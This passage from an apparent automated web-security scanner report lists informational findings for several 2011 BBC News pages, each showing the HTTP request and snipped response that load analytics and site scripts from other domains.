Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.6. http://www.bbc.co.uk/news/entertainment-arts-12426999

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12426999

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=755
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44dde5859e0a84331bd3568801b5efe625b6aa2e8020b199fb1b525adfd16f880Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 54621

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.7. http://www.bbc.co.uk/news/entertainment-arts-12427905

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12427905

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:43 GMT
Keep-Alive: timeout=10, max=795
Expires: Sat, 12 Feb 2011 02:02:43 GMT
Connection: close
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4dde595ae1a3473da406e9101b62f3e9b16bb6360c0e1e96b1b637287fdb99e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55120

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.8. http://www.bbc.co.uk/news/entertainment-arts-12428196

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/entertainment-arts-12428196

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=785
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=34bdc5753e6a24c46af7bfd651ae74ab2d77c6f2906001eaf49b9aa5529115c40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 55856

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.9. http://www.bbc.co.uk/news/health-12401970

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12401970

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:44 GMT
Keep-Alive: timeout=10, max=764
Expires: Sat, 12 Feb 2011 02:02:44 GMT
Connection: close
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=749dd505ee6a94d45bb8a1eb7181ea15481cd6f250a0e1a9db1bb32f9b14929e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:44 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56524

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.10. http://www.bbc.co.uk/news/health-12409700

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12409700

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:45 GMT
Keep-Alive: timeout=10, max=766
Expires: Sat, 12 Feb 2011 02:02:45 GMT
Connection: close
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64ad85f51ebaa425865ba814818ea7c3f3be4c31f060d16a34dbea258d402a1a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:45 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56628

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.11. http://www.bbc.co.uk/news/health-12415801

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/health-12415801

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:46 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:02:46 GMT
Connection: close
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=b4bd75e55e4ab4d63b78387e814a59f5aa3d6c168090b1ca64bb4a95fbc18cea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:46 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.12. http://www.bbc.co.uk/news/magazine-12392811

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12392811

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=789
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=24cd05b55eda44a73e6f2966d140b7f0bc3e37f1306021ca449b2a851191ca7e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 83284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.13. http://www.bbc.co.uk/news/magazine-12418046

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12418046

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:47 GMT
Keep-Alive: timeout=10, max=636
Expires: Sat, 12 Feb 2011 02:02:47 GMT
Connection: close
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=448d5535deda7427a994e811e1a37284235a5811d0f0e10f7209804cd6c077c60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:47 GMT; path=/; domain=bbc.co.uk;
Content-Length: 80543

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.14. http://www.bbc.co.uk/news/magazine-12428754

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428754

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:48 GMT
Keep-Alive: timeout=10, max=773
Expires: Sat, 12 Feb 2011 02:02:48 GMT
Connection: close
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=e48d85556efa14285a62d62d81a0ce5c90ffe57e109041491bbb638ef80de38a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:48 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.15. http://www.bbc.co.uk/news/magazine-12428759

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/magazine-12428759

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:02:49 GMT
Keep-Alive: timeout=10, max=797
Expires: Sat, 12 Feb 2011 02:02:49 GMT
Connection: close
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=141de5157e9a84891910cc2e513ceec8dc55828370903159cb7b13cf5844c6dc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:02:49 GMT; path=/; domain=bbc.co.uk;
Content-Length: 101213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
